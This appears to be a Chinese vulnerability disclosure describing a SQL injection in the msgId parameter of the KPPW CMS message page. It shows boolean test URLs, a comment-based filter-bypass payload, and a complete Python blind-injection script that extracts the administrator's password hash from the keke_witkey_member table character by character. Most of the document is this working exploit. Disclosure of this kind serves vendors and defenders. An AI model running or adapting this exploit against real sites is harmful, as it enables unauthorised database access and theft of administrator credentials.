### 简要描述:
KPPW2620150327UTF-8.zip
3月27 最新版本
### 详细说明:
Url1:
http://localhost/KPPW/index.php?do=user&view=message&op=detail&msgId=74&type=trends&intPage=1
[<img src="https://images.seebug.org/upload/201503/2723220621c436854a2914d1f1bdfdfb79bed2b3.png" alt="图片1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/2723220621c436854a2914d1f1bdfdfb79bed2b3.png)
Url2:
http://localhost/KPPW/index.php?do=user&view=message&op=detail&type=trends&intPage=1&msgId=74%26%261%3D1
[<img src="https://images.seebug.org/upload/201503/2723222698ece75cf6b1e20b8558e5b3daaefa8d.png" alt="图片2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/2723222698ece75cf6b1e20b8558e5b3daaefa8d.png)
Url3:
http://localhost/KPPW/index.php?do=user&view=message&op=detail&type=trends&intPage=1&msgId=74%26%261%3D2
[<img src="https://images.seebug.org/upload/201503/272322489410ffb629cb810421479dddd42b51fe.png" alt="图片3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/272322489410ffb629cb810421479dddd42b51fe.png)
### 漏洞证明:
由此可见 可以注入。
不过也有一些过滤。
不过可以绕过。
&&(select/**/CHAR(48))=SUBSTR((SELECT/**/password/**/from/**/keke_witkey_member/**/WHERE/**/uid=1),1,1)
附上验证脚本
```
#coding:utf-8
import httplib
def get(i1,i2):
page=""
rHtml=httplib.HTTPConnection("localhost",80,False)
url="/KPPW/index.php?do=user&view=message&op=detail&type=trends&intPage=1&msgId=74%26%26(select%2f**%2fCHAR("+i1+"))%3dSUBSTR((SELECT%2f**%2fpassword%2f**%2ffrom%2f**%2fkeke_witkey_member%2f**%2fWHERE%2f**%2fuid%3d1)%2c"+i2+",1%29"
#print url
rHtml.request("GET",url,headers={"User-Agent":"Firefox/22.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Cookie":"PHPSESSID=*","Connection":"keep-alive"})#session 需要自己设置
page=rHtml.getresponse(False)
return page.read().count('msgId=73')#关键字 大家可以自己设置
mm=[]
for i in range(1,33):
for ii in range(48,123):
if(get(str(ii),str(i))!=0):
mm.append(chr(ii))
print "".join(mm)
break
```
效果
[<img src="https://images.seebug.org/upload/201503/272325156ad62e1f592a32c84a7611cfd24d0cb3.png" alt="图片4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/272325156ad62e1f592a32c84a7611cfd24d0cb3.png)
京公网安备 11010502034610号
暂无评论